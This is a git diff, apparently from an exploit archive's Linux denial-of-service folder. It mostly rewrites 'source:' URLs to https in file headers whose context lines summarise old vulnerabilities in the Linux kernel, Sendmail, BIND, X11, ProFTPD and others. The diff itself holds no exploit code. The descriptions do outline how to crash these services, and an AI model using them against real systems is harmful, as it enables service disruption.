https://www.securityfocus.com/bid/312/info The autofs module provides support for the automount filesystem, as well as the interface between the kernel and the automountd daemon, which is responsible for the actual mounting. Calls such as chdir() executed in the automount directory are handled by the module, and if the desired directory is defined in the configuration files, automountd then mounts that directory/device. When a chdir() or similar function is called in the autofs directory, by a user doing something along the lines of "cd xxxx", the function fs/autofs/root.c:autofs_root_lookup() is called. diff --git a/exploits/linux/dos/19271.c b/exploits/linux/dos/19271.c index a10034afb..eb3fd1adb 100644 --- a/exploits/linux/dos/19271.c +++ b/exploits/linux/dos/19271.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/343/info +source: https://www.securityfocus.com/bid/343/info It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems. diff --git a/exploits/linux/dos/19272.txt b/exploits/linux/dos/19272.txt index 4a6feba2e..dd24edbdd 100644 --- a/exploits/linux/dos/19272.txt +++ b/exploits/linux/dos/19272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/344/info +source: https://www.securityfocus.com/bid/344/info Due to a rare and subtle bug in the 2.2.0 kernel, a linux machine can be forced to reboot by an unpriviliged local user. The reason for this is because of the invalid ELF core layout and the fact that munmap wipes out a vital page table entry. diff --git a/exploits/linux/dos/19282.c b/exploits/linux/dos/19282.c index fb15a370d..4bd23982f 100644 --- a/exploits/linux/dos/19282.c +++ b/exploits/linux/dos/19282.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/363/info +source: https://www.securityfocus.com/bid/363/info The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code : */ diff --git a/exploits/linux/dos/19301.c b/exploits/linux/dos/19301.c index efefc293f..1700a0d49 100644 --- a/exploits/linux/dos/19301.c +++ b/exploits/linux/dos/19301.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/376/info +source: https://www.securityfocus.com/bid/376/info Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine]. */ diff --git a/exploits/linux/dos/19308.c b/exploits/linux/dos/19308.c index 3c44256a0..39c437394 100644 --- a/exploits/linux/dos/19308.c +++ b/exploits/linux/dos/19308.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/388/info +source: https://www.securityfocus.com/bid/388/info The i_count member in the Linux inode structure is an unsigned short integer. It can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access on the target machine or cause a denial of service. diff --git a/exploits/linux/dos/19463.c b/exploits/linux/dos/19463.c index cdabe86cb..7484b1be5 100644 --- a/exploits/linux/dos/19463.c +++ b/exploits/linux/dos/19463.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/587/info +// source: https://www.securityfocus.com/bid/587/info In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt. diff --git a/exploits/linux/dos/19675.c b/exploits/linux/dos/19675.c index f325d9c3a..3fa392774 100644 --- a/exploits/linux/dos/19675.c +++ b/exploits/linux/dos/19675.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/870/info +source: https://www.securityfocus.com/bid/870/info Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability diff --git a/exploits/linux/dos/19701.sh b/exploits/linux/dos/19701.sh index 8b13d96b8..e5843d893 100755 --- a/exploits/linux/dos/19701.sh +++ b/exploits/linux/dos/19701.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/904/info +source: https://www.securityfocus.com/bid/904/info There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server. diff --git a/exploits/linux/dos/19818.c b/exploits/linux/dos/19818.c index bc45ee591..f07a1bdf1 100644 --- a/exploits/linux/dos/19818.c +++ b/exploits/linux/dos/19818.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1072/info +source: https://www.securityfocus.com/bid/1072/info A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable. */ diff --git a/exploits/linux/dos/19850.c b/exploits/linux/dos/19850.c index e08b3c5b0..0279504a6 100644 --- a/exploits/linux/dos/19850.c +++ b/exploits/linux/dos/19850.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1111/info +// source: https://www.securityfocus.com/bid/1111/info A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly. diff --git a/exploits/linux/dos/19869.txt b/exploits/linux/dos/19869.txt index a39203430..7d031e1c5 100644 --- a/exploits/linux/dos/19869.txt +++ b/exploits/linux/dos/19869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1132/info +source: https://www.securityfocus.com/bid/1132/info Vulnerabilities exist in a number of pop3 daemon implementations, having to do with their creation of lock files. Affected include Qualcomm's qpopper, and the popd included as part of the imap-4 rpm from RedHat. Lockfiles in both implementation are created with consistent local file names; the RedHat popd in /tmp, with a fairly random name (albeit consistent for a given user), and in the mail spool directory, with the user name prepended by a "." and appended with ".pop". Creation of either of these files will prevent the popd user from being able to establish a connection to retrieve their mail. diff --git a/exploits/linux/dos/19870.pl b/exploits/linux/dos/19870.pl index 942efbea9..299a5e080 100755 --- a/exploits/linux/dos/19870.pl +++ b/exploits/linux/dos/19870.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1136/info +source: https://www.securityfocus.com/bid/1136/info CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken. diff --git a/exploits/linux/dos/19950.c b/exploits/linux/dos/19950.c index 25a01dfc9..e99ae19f7 100644 --- a/exploits/linux/dos/19950.c +++ b/exploits/linux/dos/19950.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1235/info +source: https://www.securityfocus.com/bid/1235/info A denial of service exists in XFree86 3.3.5, 3.3.6 and 4.0. A remote user can send a malformed packet to the TCP listening port, 6000, which will cause the X server to be unresponsive for some period of time. During this time, the keyboard will not respond to user input, and in some cases, the mouse will also not respond. During this time period, the X server will utilize 100% of the CPU, and can only be repaired by being signaled. This vulnerability exists only in servers compiled with the XCSECURITY #define set. This can be verified by running the following: strings /path/to/XF86_SVGA | grep "XC-QUERY-SECURITY-1" diff --git a/exploits/linux/dos/20023.c b/exploits/linux/dos/20023.c index 6def8fb93..89b7e722f 100644 --- a/exploits/linux/dos/20023.c +++ b/exploits/linux/dos/20023.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1369/info +// source: https://www.securityfocus.com/bid/1369/info A denial of service vulnerability exists in libICE, part of the X11 windowing system. Any libICE application which creates inet listening sockets can be remotely crashed. This is due to a bug in the handling of the SKIP_STRING macro. By supplying a large value for the skip value, it is possible to cause a pointer to point to uninitialized memory. This in turn will cause a segfault. diff --git a/exploits/linux/dos/20025.txt b/exploits/linux/dos/20025.txt index fd1c7566a..caff26400 100644 --- a/exploits/linux/dos/20025.txt +++ b/exploits/linux/dos/20025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1372/info +source: https://www.securityfocus.com/bid/1372/info A denial of service attack exists in the NFS lock daemon supplied with Linux. By connecting to the port rpc.lockd is running on, and supplying random input, it will cause lockd to exit with an error. The socket associated with rpc.lockd is also not properly released, and cannot be rebound to without a reboot. diff --git a/exploits/linux/dos/20026.c b/exploits/linux/dos/20026.c index 657dc2f9d..33d2a9da5 100644 --- a/exploits/linux/dos/20026.c +++ b/exploits/linux/dos/20026.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1377/info +// source: https://www.securityfocus.com/bid/1377/info gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to a locally exploitable denial of service attack. If a malicious user makes too many connections to the device, it will hang and gpm will not function. RedHat 6.1 is confirmed to be vulnerable. It is not known what other linux distributions may also be vulnerable. diff --git a/exploits/linux/dos/20217.txt b/exploits/linux/dos/20217.txt index 85bd7abcf..c3590c5f1 100644 --- a/exploits/linux/dos/20217.txt +++ b/exploits/linux/dos/20217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1664/info +source: https://www.securityfocus.com/bid/1664/info Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself. diff --git a/exploits/linux/dos/20388.txt b/exploits/linux/dos/20388.txt index c8d2c3eb9..e1f3061c5 100644 --- a/exploits/linux/dos/20388.txt +++ b/exploits/linux/dos/20388.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1923/info +source: https://www.securityfocus.com/bid/1923/info BIND is the Berkeley Internet Name Daemon, a free Name Resolution software package maintained by the Internet Software Consortium. A Denial of Service exists in current implementations. diff --git a/exploits/linux/dos/20494.pl b/exploits/linux/dos/20494.pl index 5e06d2b88..aad9a99aa 100755 --- a/exploits/linux/dos/20494.pl +++ b/exploits/linux/dos/20494.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2098/info +source: https://www.securityfocus.com/bid/2098/info Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD. diff --git a/exploits/linux/dos/20535.txt b/exploits/linux/dos/20535.txt index 15e3dacd8..e9adefeeb 100644 --- a/exploits/linux/dos/20535.txt +++ b/exploits/linux/dos/20535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2180/info +source: https://www.securityfocus.com/bid/2180/info ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained. diff --git a/exploits/linux/dos/20536.java b/exploits/linux/dos/20536.java index e49dac4aa..5ff1bac8f 100644 --- a/exploits/linux/dos/20536.java +++ b/exploits/linux/dos/20536.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2185/info +source: https://www.securityfocus.com/bid/2185/info A memory leak has been reported in all versions of ProFTPd. diff --git a/exploits/linux/dos/20561.pl b/exploits/linux/dos/20561.pl index 4ba06d9fa..5b0634b31 100755 --- a/exploits/linux/dos/20561.pl +++ b/exploits/linux/dos/20561.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2237/info +source: https://www.securityfocus.com/bid/2237/info qmail is an e-mail server package developed by Dan Bernstein. diff --git a/exploits/linux/dos/20562.c b/exploits/linux/dos/20562.c index c9e107ff1..d26faec27 100644 --- a/exploits/linux/dos/20562.c +++ b/exploits/linux/dos/20562.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2237/info +// source: https://www.securityfocus.com/bid/2237/info qmail is an e-mail server package developed by Dan Bernstein. diff --git a/exploits/linux/dos/20566.c b/exploits/linux/dos/20566.c index 0333bae6f..9265367eb 100644 --- a/exploits/linux/dos/20566.c +++ b/exploits/linux/dos/20566.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2247/info +source: https://www.securityfocus.com/bid/2247/info Linux kernel versions 2.1.89 to 2.2.3 are vulnerable to a denial of service attack caused when a 0-length IP fragment is received, if it is the first fragment in the list. Several thousands 0-length packets must be sent in order for this to initiate a denial of service against the target. */ diff --git a/exploits/linux/dos/20747.txt b/exploits/linux/dos/20747.txt index e80118008..b2138df67 100644 --- a/exploits/linux/dos/20747.txt +++ b/exploits/linux/dos/20747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2569/info +source: https://www.securityfocus.com/bid/2569/info The shared library 'ndwfn4.so' that ships with Oracle Application Server is vulnerable to a buffer overflow. The library is used to handle web requests passed to it by the iPlanet web server. If the library is sent a request longer than approximately 2050 characters, it will overflow. diff --git a/exploits/linux/dos/20750.txt b/exploits/linux/dos/20750.txt index 38c0c6cbd..d77f7772f 100644 --- a/exploits/linux/dos/20750.txt +++ b/exploits/linux/dos/20750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2579/info +source: https://www.securityfocus.com/bid/2579/info Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network. diff --git a/exploits/linux/dos/20952.c b/exploits/linux/dos/20952.c index 71e849b74..ff28e6d32 100644 --- a/exploits/linux/dos/20952.c +++ b/exploits/linux/dos/20952.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2908/info +// source: https://www.securityfocus.com/bid/2908/info eXtremail is a freeware SMTP server available for Linux and AIX. diff --git a/exploits/linux/dos/21122.sh b/exploits/linux/dos/21122.sh index d3437d367..c367fa237 100755 --- a/exploits/linux/dos/21122.sh +++ b/exploits/linux/dos/21122.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3444/info +source: https://www.securityfocus.com/bid/3444/info A denial-of-service vulnerability exists in several versions of the Linux kernel. diff --git a/exploits/linux/dos/21141.txt b/exploits/linux/dos/21141.txt index 2d560075c..748376879 100644 --- a/exploits/linux/dos/21141.txt +++ b/exploits/linux/dos/21141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3506/info +source: https://www.securityfocus.com/bid/3506/info TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content. diff --git a/exploits/linux/dos/21202.txt b/exploits/linux/dos/21202.txt index 20223d244..255d3bb38 100644 --- a/exploits/linux/dos/21202.txt +++ b/exploits/linux/dos/21202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3782/info +source: https://www.securityfocus.com/bid/3782/info Anti-Web HTTPD is a freely available, open source web server designed for use on the Linux platform. It is maintained by Doug Hoyte. diff --git a/exploits/linux/dos/21262.txt b/exploits/linux/dos/21262.txt index 9f05fe7de..24c6e63c9 100644 --- a/exploits/linux/dos/21262.txt +++ b/exploits/linux/dos/21262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4018/info +source: https://www.securityfocus.com/bid/4018/info kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client. diff --git a/exploits/linux/dos/21338.pl b/exploits/linux/dos/21338.pl index 1794715ad..beddfd976 100755 --- a/exploits/linux/dos/21338.pl +++ b/exploits/linux/dos/21338.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4260/info +source: https://www.securityfocus.com/bid/4260/info XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources. diff --git a/exploits/linux/dos/21476.c b/exploits/linux/dos/21476.c index 985e16053..e2ba7e6d2 100644 --- a/exploits/linux/dos/21476.c +++ b/exploits/linux/dos/21476.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4822/info +source: https://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. diff --git a/exploits/linux/dos/21477.c b/exploits/linux/dos/21477.c index e7bb1d85d..4bad0c181 100644 --- a/exploits/linux/dos/21477.c +++ b/exploits/linux/dos/21477.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4822/info +// source: https://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. diff --git a/exploits/linux/dos/21482.txt b/exploits/linux/dos/21482.txt index 44919b5fc..6be03f654 100644 --- a/exploits/linux/dos/21482.txt +++ b/exploits/linux/dos/21482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4828/info +source: https://www.securityfocus.com/bid/4828/info The PGP Public Key Server is a freely available, open source software package distributed by MIT. It is designed for use on Linux and Unix operating systems. diff --git a/exploits/linux/dos/21518.txt b/exploits/linux/dos/21518.txt index 452250d4e..fdda7e803 100644 --- a/exploits/linux/dos/21518.txt +++ b/exploits/linux/dos/21518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4966/info +source: https://www.securityfocus.com/bid/4966/info X Window System behaves unpredictably when handling an overly large font size. If an attacker can pass an overly large font size to X Window System, it is possible to cause a denial of service condition. diff --git a/exploits/linux/dos/21534.jsp b/exploits/linux/dos/21534.jsp index 6818f7517..4c338443c 100644 --- a/exploits/linux/dos/21534.jsp +++ b/exploits/linux/dos/21534.jsp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4995/info +source: https://www.securityfocus.com/bid/4995/info A vulnerability has been reported in Apache Tomcat for Windows that results in a denial of service condition. The vulnerability occurs when Tomcat encounters a malicious JSP page. diff --git a/exploits/linux/dos/21537.c b/exploits/linux/dos/21537.c index 8878f8a97..1f777449c 100644 --- a/exploits/linux/dos/21537.c +++ b/exploits/linux/dos/21537.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4998/info +// source: https://www.securityfocus.com/bid/4998/info IRCIT is a terminal based IRC client for Linux and Unix systems. diff --git a/exploits/linux/dos/21580.txt b/exploits/linux/dos/21580.txt index 9a75688ca..af32515ce 100644 --- a/exploits/linux/dos/21580.txt +++ b/exploits/linux/dos/21580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5098/info +source: https://www.securityfocus.com/bid/5098/info Inktomi Traffic Server is a transparent web caching application. It is designed for use with Unix and Linux variants as well as Microsoft Windows operating environments. diff --git a/exploits/linux/dos/21598.c b/exploits/linux/dos/21598.c index 9aa9bc08f..1f05f3bff 100644 --- a/exploits/linux/dos/21598.c +++ b/exploits/linux/dos/21598.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5178/info +source: https://www.securityfocus.com/bid/5178/info The Linux kernel is a freely available, open source kernel originally written by Linus Torvalds. It is the core of all Linux distributions. diff --git a/exploits/linux/dos/21775.c b/exploits/linux/dos/21775.c index ae252f7d6..f35eebcc7 100644 --- a/exploits/linux/dos/21775.c +++ b/exploits/linux/dos/21775.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5664/info +// source: https://www.securityfocus.com/bid/5664/info SWS Simple Web Server is prone to a denial of service when requests not ending with a newline are received. diff --git a/exploits/linux/dos/21854.c b/exploits/linux/dos/21854.c index 8e9d0b264..1b2852493 100644 --- a/exploits/linux/dos/21854.c +++ b/exploits/linux/dos/21854.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5787/info +// source: https://www.securityfocus.com/bid/5787/info Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system. diff --git a/exploits/linux/dos/21985.txt b/exploits/linux/dos/21985.txt index c33103c19..ce617928f 100644 --- a/exploits/linux/dos/21985.txt +++ b/exploits/linux/dos/21985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6120/info +source: https://www.securityfocus.com/bid/6120/info A heap corruption may occur when Pine receives an email message containing a particularly crafted "From:" address. Though the address is RFC compliant, Pine reportedly fails to parse it correctly, resulting in a core dump. Execution of arbitrary code may be possible. diff --git a/exploits/linux/dos/22011.c b/exploits/linux/dos/22011.c index c288681d3..fdc2d9d1f 100644 --- a/exploits/linux/dos/22011.c +++ b/exploits/linux/dos/22011.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6161/info +// source: https://www.securityfocus.com/bid/6161/info ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a non-existant sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. diff --git a/exploits/linux/dos/22033.txt b/exploits/linux/dos/22033.txt index 4e73ab252..f480a76cf 100644 --- a/exploits/linux/dos/22033.txt +++ b/exploits/linux/dos/22033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6239/info +source: https://www.securityfocus.com/bid/6239/info Several buffer overflow conditions have been reported for WSMP3. The vulnerability is due to improper bounds checking when copying data to local buffers. diff --git a/exploits/linux/dos/22056.txt b/exploits/linux/dos/22056.txt index 8b921cf1c..c2383a982 100644 --- a/exploits/linux/dos/22056.txt +++ b/exploits/linux/dos/22056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6285/info +source: https://www.securityfocus.com/bid/6285/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/dos/22059.pl b/exploits/linux/dos/22059.pl index 386dc5cfa..ca57938ac 100755 --- a/exploits/linux/dos/22059.pl +++ b/exploits/linux/dos/22059.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6287/info +source: https://www.securityfocus.com/bid/6287/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/dos/22061.txt b/exploits/linux/dos/22061.txt index b8caa1850..ea5e1a22a 100644 --- a/exploits/linux/dos/22061.txt +++ b/exploits/linux/dos/22061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6298/info +source: https://www.securityfocus.com/bid/6298/info Cyrus IMAPD is a freely available, open source Interactive Mail Access Protocol (IMAP) daemon. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/dos/22079.sh b/exploits/linux/dos/22079.sh index b7ff23061..a16bef4cc 100755 --- a/exploits/linux/dos/22079.sh +++ b/exploits/linux/dos/22079.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6341/info +source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition. diff --git a/exploits/linux/dos/22105.c b/exploits/linux/dos/22105.c index 364c73891..3fceb6411 100644 --- a/exploits/linux/dos/22105.c +++ b/exploits/linux/dos/22105.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6420/info +source: https://www.securityfocus.com/bid/6420/info A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap(). diff --git a/exploits/linux/dos/22183.c b/exploits/linux/dos/22183.c index 84f32f9fc..1222ecc55 100644 --- a/exploits/linux/dos/22183.c +++ b/exploits/linux/dos/22183.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6636/info +// source: https://www.securityfocus.com/bid/6636/info A vulnerability has been reported for several games that support the use of the GameSpy network. diff --git a/exploits/linux/dos/22191.pl b/exploits/linux/dos/22191.pl index e713705bd..f7bd7bbf6 100755 --- a/exploits/linux/dos/22191.pl +++ b/exploits/linux/dos/22191.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6662/info +source: https://www.securityfocus.com/bid/6662/info A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash. diff --git a/exploits/linux/dos/22197.txt b/exploits/linux/dos/22197.txt index d588a45ad..ecb8428c7 100644 --- a/exploits/linux/dos/22197.txt +++ b/exploits/linux/dos/22197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6676/info +source: https://www.securityfocus.com/bid/6676/info A vulnerability has been discovered in slocate. It has been reported that a buffer overrun occurs when running the slocate program with command line arguments of excessive length. Specifically, it is possible to overrun a buffer in slocate by supplying excessive data as the regex ('-r') and parse /etc/updatedb.conf ('-c') command line options. diff --git a/exploits/linux/dos/22243.txt b/exploits/linux/dos/22243.txt index b76a32ece..391086f78 100644 --- a/exploits/linux/dos/22243.txt +++ b/exploits/linux/dos/22243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6822/info +source: https://www.securityfocus.com/bid/6822/info A buffer overflow vulnerability has been reported for FAR that may result in a denial of service condition. The vulnerability exists due to insufficient bounds checking performed by FAR when parsing directory paths. Specifically, when FAR attempts to parse overly long paths it will crash thereby resulting in a denial of service condition. diff --git a/exploits/linux/dos/22259.c b/exploits/linux/dos/22259.c index 50910e335..52f19b414 100644 --- a/exploits/linux/dos/22259.c +++ b/exploits/linux/dos/22259.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6880/info +// source: https://www.securityfocus.com/bid/6880/info It has been reported that BitchX does not properly handle some types of replies contained in the RPL_NAMREPLY numeric. When a malformed reply is received by the client, the client crashes, resulting in a denial of service. diff --git a/exploits/linux/dos/22273.c b/exploits/linux/dos/22273.c index 078f3ffbd..d57ebe6a2 100644 --- a/exploits/linux/dos/22273.c +++ b/exploits/linux/dos/22273.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6913/info +// source: https://www.securityfocus.com/bid/6913/info A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function. diff --git a/exploits/linux/dos/22294.c b/exploits/linux/dos/22294.c index 5f2484f06..886723396 100644 --- a/exploits/linux/dos/22294.c +++ b/exploits/linux/dos/22294.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6974/info +// source: https://www.securityfocus.com/bid/6974/info It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted. diff --git a/exploits/linux/dos/22352.txt b/exploits/linux/dos/22352.txt index 81ffbb6ec..8867ccc37 100644 --- a/exploits/linux/dos/22352.txt +++ b/exploits/linux/dos/22352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7090/info +source: https://www.securityfocus.com/bid/7090/info It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted. diff --git a/exploits/linux/dos/22370.txt b/exploits/linux/dos/22370.txt index ad94b261d..cacb8f212 100644 --- a/exploits/linux/dos/22370.txt +++ b/exploits/linux/dos/22370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7118/info +source: https://www.securityfocus.com/bid/7118/info A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash. diff --git a/exploits/linux/dos/22433.pl b/exploits/linux/dos/22433.pl index e3573ecf8..a17c2fd19 100755 --- a/exploits/linux/dos/22433.pl +++ b/exploits/linux/dos/22433.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7202/info +source: https://www.securityfocus.com/bid/7202/info Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplied values, resulting in code execution. Exploitation attempts may also result in a denial of service. diff --git a/exploits/linux/dos/22446.txt b/exploits/linux/dos/22446.txt index a7917b466..982c8bac3 100644 --- a/exploits/linux/dos/22446.txt +++ b/exploits/linux/dos/22446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7243/info +source: https://www.securityfocus.com/bid/7243/info It has been reported that the EZ Server software does not sufficiently handle strings of excessive length in some circumstances. Because of this, a remote attacker may be able to deny service to legitimate users of the system. diff --git a/exploits/linux/dos/22508.sh b/exploits/linux/dos/22508.sh index 9e1360afe..62a757369 100755 --- a/exploits/linux/dos/22508.sh +++ b/exploits/linux/dos/22508.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7382/info +source: https://www.securityfocus.com/bid/7382/info A denial of service vulnerability has been reported for Xinetd. The vulnerability exists due to memory leaks occuring when connections are rejected. diff --git a/exploits/linux/dos/22527.c b/exploits/linux/dos/22527.c index 9703f886b..eaa6a570a 100644 --- a/exploits/linux/dos/22527.c +++ b/exploits/linux/dos/22527.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7410/info 